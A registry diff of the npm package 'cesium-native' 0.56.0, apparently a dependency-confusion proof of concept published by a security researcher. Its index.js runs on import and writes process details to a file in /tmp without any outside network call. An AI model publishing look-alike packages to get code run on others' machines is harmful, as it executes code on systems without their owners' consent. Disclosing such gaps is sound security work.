cesium-native 0.56.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +14 -0
- package/index.js +18 -0
- package/package.json +13 -0
package/README.md
ADDED
|
@@ -0,0 +1,14 @@
|
|
|
1
|
+
# cesium-native
|
|
2
|
+
|
|
3
|
+
RCE From The Package `cesium-native` Due To Dependency Confusion Resulting To RCE.
|
|
4
|
+
|
|
5
|
+
> ⚠️ This package name is a prove of an RCE by @Steiner254.
|
|
6
|
+
|
|
7
|
+
## Security Proof of Concept
|
|
8
|
+
|
|
9
|
+
This package contains a **non-malicious proof of remote code execution (RCE)**.
|
|
10
|
+
|
|
11
|
+
When installed or imported, it:
|
|
12
|
+
- Executes JavaScript code
|
|
13
|
+
- Writes a harmless file to `/tmp`
|
|
14
|
+
- Produces console output confirming execution
|
package/index.js
ADDED
|
@@ -0,0 +1,18 @@
|
|
|
1
|
+
const fs = require("fs");
|
|
2
|
+
const path = require("path");
|
|
3
|
+
|
|
4
|
+
(function proofOfRCE() {
|
|
5
|
+
const output = {
|
|
6
|
+
message: "RCE proof: arbitrary code execution achieved",
|
|
7
|
+
pid: process.pid,
|
|
8
|
+
cwd: process.cwd(),
|
|
9
|
+
node: process.version,
|
|
10
|
+
timestamp: new Date().toISOString()
|
|
11
|
+
};
|
|
12
|
+
|
|
13
|
+
const filePath = path.join("/tmp", "rce-proof-cesium-native.txt");
|
|
14
|
+
|
|
15
|
+
fs.writeFileSync(filePath, JSON.stringify(output, null, 2));
|
|
16
|
+
|
|
17
|
+
console.log("[RCE-POC] Code execution confirmed.");
|
|
18
|
+
})();
|
package/package.json
ADDED